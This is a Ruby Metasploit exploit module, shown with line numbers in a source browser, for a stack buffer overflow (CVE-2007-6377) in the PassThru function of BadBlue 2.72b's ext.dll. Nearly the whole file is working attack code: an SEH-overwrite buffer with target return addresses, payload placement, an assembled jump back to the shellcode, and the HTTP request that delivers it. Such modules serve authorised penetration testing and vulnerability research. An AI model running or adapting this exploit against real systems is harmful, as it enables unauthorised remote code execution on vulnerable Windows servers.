root / modules / exploits / windows / http / badblue_passthru.rb @ master
History | View | Annotate | Download (2.8 kB)
| 1 |
##
|
|---|---|
| 2 |
# $Id$
|
| 3 |
##
|
| 4 |
|
| 5 |
##
|
| 6 |
# This file is part of the Metasploit Framework and may be subject to
|
| 7 |
# redistribution and commercial restrictions. Please see the Metasploit
|
| 8 |
# web site for more information on licensing and terms of use.
|
| 9 |
# http://metasploit.com/
|
| 10 |
##
|
| 11 |
|
| 12 |
require 'msf/core'
|
| 13 |
|
| 14 |
class Metasploit3 < Msf::Exploit::Remote |
| 15 |
Rank = GreatRanking |
| 16 |
|
| 17 |
# NOTE: BadBlue doesn't give any HTTP headers when requesting '/'.
|
| 18 |
# However, a proper Server header is returned when requesting /index.html or using HEAD.
|
| 19 |
HttpFingerprint = { :method => 'HEAD', :pattern => [ /BadBlue\// ] } |
| 20 |
|
| 21 |
include Msf::Exploit::Remote::HttpClient |
| 22 |
include Msf::Exploit::Seh |
| 23 |
|
| 24 |
def initialize(info = {}) |
| 25 |
super(update_info(info,
|
| 26 |
'Name' => 'BadBlue 2.72b PassThru Buffer Overflow', |
| 27 |
'Description' => %q{ |
| 28 |
This module exploits a stack buffer overflow in the PassThru |
| 29 |
functionality in ext.dll in BadBlue 2.72b and earlier. |
| 30 |
},
|
| 31 |
'Author' => [ 'MC' ], |
| 32 |
'License' => MSF_LICENSE, |
| 33 |
'Version' => '$Revision$', |
| 34 |
'References' =>
|
| 35 |
[ |
| 36 |
['CVE', '2007-6377'], |
| 37 |
['OSVDB', '42416'], |
| 38 |
['BID', '26803'], |
| 39 |
], |
| 40 |
'DefaultOptions' =>
|
| 41 |
{
|
| 42 |
'EXITFUNC' => 'thread', |
| 43 |
}, |
| 44 |
'Privileged' => true, |
| 45 |
'Payload' =>
|
| 46 |
{
|
| 47 |
'Space' => 750, |
| 48 |
'BadChars' => "\x00\x0a\x0b\x0d\x20\x23\x25\x26\x2b\x2f\x3a\x3c\x3d\x3f\x5c", |
| 49 |
'StackAdjustment' => -3500, |
| 50 |
#'EncoderType' => Msf::Encoder::Type::AlphanumUpper,
|
| 51 |
'DisableNops' => 'True', |
| 52 |
}, |
| 53 |
'Platform' => 'win', |
| 54 |
'Targets' =>
|
| 55 |
[ |
| 56 |
# This is the version being distributed on badblue.com as of Jul 7th 2010
|
| 57 |
[ 'BadBlue EE 2.7 Universal', { 'Ret' => 0x10033f44 } ], # pop/pop/ret in ext.dll v1.0.0.1 (06a6dc81924ba94bfbbd00902d054db2) |
| 58 |
[ 'BadBlue 2.72b Universal', { 'Ret' => 0x1003f2f3 } ] # pop/pop/ret from ?? |
| 59 |
], |
| 60 |
'DefaultTarget' => 0, |
| 61 |
'DisclosureDate' => 'Dec 10 2007')) |
| 62 |
end
|
| 63 |
|
| 64 |
def exploit |
| 65 |
seh_offset = 4116
|
| 66 |
#sploit = Rex::Text.pattern_create(seh_offset)
|
| 67 |
sploit = rand_text(seh_offset) |
| 68 |
# Need to jump over the nul byte
|
| 69 |
seh = Rex::Arch::X86.jmp_short(8) + rand_text(2) + [target.ret].pack('V') |
| 70 |
sploit << seh |
| 71 |
|
| 72 |
plen = payload.encoded.length |
| 73 |
sploit[seh_offset - 16 - plen, plen] = payload.encoded
|
| 74 |
|
| 75 |
# This pointer will force a crash when it is used in a lock instruction
|
| 76 |
ptr = rand_text(3)
|
| 77 |
ptr << [0x80|rand(256)].pack('C') |
| 78 |
sploit[seh_offset - 8,4] = ptr |
| 79 |
|
| 80 |
# These two bytes get corrupted, so we can't use them.
|
| 81 |
sploit << rand_text(2)
|
| 82 |
|
| 83 |
# jump back to the payload
|
| 84 |
distance = 2 + 8 + 16 + plen |
| 85 |
sploit << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-#{distance}").encode_string |
| 86 |
|
| 87 |
|
| 88 |
# Build the final URI
|
| 89 |
uri = "/ext.dll?mfcisapicommand=PassThru&"
|
| 90 |
uri << sploit |
| 91 |
|
| 92 |
print_status("Trying target %s..." % target.name)
|
| 93 |
send_request_raw({ 'uri' => uri }, 5)
|
| 94 |
|
| 95 |
handler |
| 96 |
disconnect |
| 97 |
end
|
| 98 |
|
| 99 |
end
|